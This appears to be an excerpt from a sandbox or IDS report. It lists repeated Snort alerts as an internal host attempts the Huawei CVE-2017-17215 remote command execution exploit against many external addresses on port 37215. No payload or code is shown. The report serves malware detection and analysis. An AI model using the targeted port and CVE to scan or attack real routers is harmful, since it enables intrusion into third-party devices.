                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:59976 -> 121.209.116.212:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:47604 -> 204.65.167.10:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:47604 -> 204.65.167.10:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:40396 -> 174.135.199.129:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:40396 -> 174.135.199.129:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:36848 -> 164.152.114.92:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:36848 -> 164.152.114.92:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:43644 -> 197.170.178.75:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:43644 -> 197.170.178.75:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:54762 -> 197.94.74.21:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:54762 -> 197.94.74.21:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:44942 -> 180.149.134.73:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:44942 -> 180.149.134.73:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:57942 -> 157.100.189.26:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:57942 -> 157.100.189.26:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:43180 -> 41.51.127.171:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:43180 -> 41.51.127.171:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:41910 -> 157.98.20.252:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:41910 -> 157.98.20.252:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:34194 -> 41.254.196.153:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:34194 -> 41.254.196.153:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:49244 -> 41.42.206.73:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:49244 -> 41.42.206.73:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:58744 -> 32.8.164.81:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:58744 -> 32.8.164.81:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:52160 -> 197.38.238.183:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:52160 -> 197.38.238.183:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:54950 -> 41.65.214.53:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:54950 -> 41.65.214.53:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:56302 -> 198.45.18.250:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:56302 -> 198.45.18.250:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:40842 -> 190.164.230.172:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:40842 -> 190.164.230.172:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:50928 -> 75.163.132.69:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:50928 -> 75.163.132.69:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:55632 -> 157.37.121.244:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:55632 -> 157.37.121.244:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:38644 -> 45.182.212.164:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:38644 -> 45.182.212.164:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:39896 -> 41.19.68.136:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:39896 -> 41.19.68.136:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:56584 -> 221.229.167.177:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:56584 -> 221.229.167.177:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:45864 -> 197.27.127.22:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:45864 -> 197.27.127.22:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:39384 -> 170.233.211.253:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:39384 -> 170.233.211.253:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:51272 -> 157.146.42.35:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:51272 -> 157.146.42.35:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:41276 -> 157.38.20.146:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:41276 -> 157.38.20.146:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:51850 -> 197.26.32.199:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:51850 -> 197.26.32.199:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:55664 -> 208.191.39.47:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:55664 -> 208.191.39.47:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:54276 -> 41.13.154.17:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:54276 -> 41.13.154.17:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:59668 -> 41.17.43.162:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:59668 -> 41.17.43.162:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:37880 -> 157.162.164.93:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:37880 -> 157.162.164.93:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:41154 -> 197.219.167.144:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:41154 -> 197.219.167.144:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:49580 -> 14.63.31.137:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:49580 -> 14.63.31.137:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:53414 -> 157.130.208.54:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:53414 -> 157.130.208.54:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:36134 -> 41.205.179.211:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:36134 -> 41.205.179.211:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:60812 -> 157.27.2.225:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:60812 -> 157.27.2.225:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:43704 -> 197.213.57.205:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:43704 -> 197.213.57.205:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:36764 -> 41.74.40.186:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:36764 -> 41.74.40.186:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:49376 -> 116.132.59.169:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:49376 -> 116.132.59.169:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:60992 -> 197.47.178.20:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:60992 -> 197.47.178.20:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:38450 -> 197.6.98.173:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:38450 -> 197.6.98.173:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:48346 -> 197.47.165.186:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:48346 -> 197.47.165.186:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:60696 -> 157.227.113.44:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:60696 -> 157.227.113.44:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:43206 -> 133.62.206.236:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:43206 -> 133.62.206.236:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:34958 -> 157.201.151.163:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:34958 -> 157.201.151.163:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:46826 -> 197.113.224.94:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:46826 -> 197.113.224.94:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:40716 -> 8.206.119.75:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:40716 -> 8.206.119.75:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:53346 -> 211.106.125.212:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:53346 -> 211.106.125.212:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:54356 -> 41.52.176.189:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:54356 -> 41.52.176.189:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:60454 -> 1.160.229.40:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:60454 -> 1.160.229.40:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:51668 -> 157.28.53.140:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:51668 -> 157.28.53.140:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:44232 -> 41.219.3.184:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:44232 -> 41.219.3.184:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:57442 -> 157.16.85.248:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:57442 -> 157.16.85.248:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:51144 -> 136.230.51.161:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:51144 -> 136.230.51.161:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:43456 -> 197.167.43.41:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:43456 -> 197.167.43.41:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:39756 -> 157.12.154.103:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:39756 -> 157.12.154.103:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:57654 -> 197.155.87.199:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:57654 -> 197.155.87.199:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:44460 -> 197.183.189.239:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:44460 -> 197.183.189.239:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:46926 -> 197.1.185.169:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:46926 -> 197.1.185.169:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:48094 -> 157.153.180.139:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:48094 -> 157.153.180.139:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:46008 -> 197.164.107.109:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:46008 -> 197.164.107.109:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:47510 -> 34.202.46.128:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:47510 -> 34.202.46.128:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:60312 -> 197.160.70.240:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:60312 -> 197.160.70.240:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:36542 -> 197.81.135.223:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:36542 -> 197.81.135.223:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:54818 -> 197.145.253.73:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:54818 -> 197.145.253.73:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:49950 -> 157.76.186.37:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:49950 -> 157.76.186.37:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:39506 -> 157.51.200.31:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:39506 -> 157.51.200.31:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:43338 -> 197.144.99.86:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:43338 -> 197.144.99.86:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:57044 -> 41.179.93.180:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:57044 -> 41.179.93.180:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:41262 -> 41.124.78.80:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:41262 -> 41.124.78.80:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:51844 -> 183.188.212.130:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:51844 -> 183.188.212.130:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:38516 -> 64.130.174.77:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:38516 -> 64.130.174.77:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:52084 -> 197.36.42.86:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:52084 -> 197.36.42.86:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:51022 -> 91.134.129.146:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:51022 -> 91.134.129.146:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:52518 -> 197.49.145.149:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:52518 -> 197.49.145.149:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:42462 -> 197.86.55.32:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:42462 -> 197.86.55.32:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:52616 -> 197.91.156.105:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:52616 -> 197.91.156.105:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:47918 -> 99.80.150.223:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:47918 -> 99.80.150.223:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:36990 -> 157.40.221.74:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:36990 -> 157.40.221.74:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:60046 -> 157.233.107.21:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:60046 -> 157.233.107.21:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:34800 -> 197.232.70.152:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:34800 -> 197.232.70.152:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:59170 -> 57.147.31.177:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:59170 -> 57.147.31.177:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:56002 -> 157.155.131.147:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:56002 -> 157.155.131.147:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:58484 -> 151.249.104.249:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:58484 -> 151.249.104.249:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:55504 -> 90.121.157.161:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:55504 -> 90.121.157.161:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:60838 -> 197.127.169.149:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:60838 -> 197.127.169.149:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:59528 -> 193.24.185.130:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:59528 -> 193.24.185.130:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:52550 -> 41.206.29.121:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:52550 -> 41.206.29.121:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:46882 -> 197.26.201.125:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:46882 -> 197.26.201.125:37215
